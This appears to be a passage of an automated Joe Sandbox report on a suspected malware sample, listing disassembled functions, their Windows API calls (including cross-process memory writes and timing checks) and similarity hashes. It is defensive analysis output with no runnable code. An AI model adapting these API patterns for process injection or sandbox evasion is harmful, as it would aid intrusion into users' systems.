                            Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00434598
                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                            • Sleep.KERNEL32(00000000), ref: 004345D4
                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuerySleep
                            • String ID:
                            • API String ID: 2875609808-0
                            • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                            • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                            • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                            • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                            Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                            • MessageBeep.USER32(00000000), ref: 00460C46
                            • KillTimer.USER32(?,0000040A), ref: 00460C68
                            • EndDialog.USER32(?,00000001), ref: 00460C83
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                            • String ID:
                            • API String ID: 3741023627-0
                            • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                            • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                            • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                            • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                            Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$Icon
                            • String ID:
                            • API String ID: 4023252218-0
                            • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                            • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                            • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                            • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                            Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                            • String ID:
                            • API String ID: 1489400265-0
                            • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                            • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                            • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                            • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                            Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                            • DestroyWindow.USER32(?), ref: 00455728
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                            • String ID:
                            • API String ID: 1042038666-0
                            • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                            • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                            • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                            • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                            Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Path$ObjectStroke$DeleteFillSelect
                            • String ID:
                            • API String ID: 2625713937-0
                            • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                            • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                            • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                            • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                            Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 0041780F
                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                            • __getptd.LIBCMT ref: 00417826
                            • __amsg_exit.LIBCMT ref: 00417834
                            • __lock.LIBCMT ref: 00417844
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                            • String ID:
                            • API String ID: 938513278-0
                            • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                            • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                            • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                            • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                            Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                            • ExitThread.KERNEL32 ref: 00413D4E
                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                            • __freefls@4.LIBCMT ref: 00413D74
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                            • String ID:
                            • API String ID: 2403457894-0
                            • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                            • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                            • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                            • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                            Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                            • ExitThread.KERNEL32 ref: 004151ED
                            • __freefls@4.LIBCMT ref: 00415209
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                            • String ID:
                            • API String ID: 4247068974-0
                            • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                            • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                            • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                            • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                            Function 004624C5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 409COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID: 5$8$^
                            • API String ID: 0-3622883839
                            • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                            • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                            • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                            • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                            Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID: )$U$\
                            • API String ID: 0-3705770531
                            • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                            • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                            • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                            • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                            Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                            • CoInitialize.OLE32(00000000), ref: 0046E505
                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                            • CoUninitialize.OLE32 ref: 0046E53D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                            • String ID: .lnk
                            • API String ID: 886957087-24824748
                            • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                            • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                            • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                            • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                            Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                            Download Yara Rule
                            Strings
                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                            • API String ID: 708495834-557222456
                            • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                            • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                            • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                            • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                            Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                              • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                              • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                              • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                              • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                            • String ID: @
                            • API String ID: 4150878124-2766056989
                            • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                            • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                            • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                            • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                            Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: \$]$h
                            • API String ID: 4104443479-3262404753
                            • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
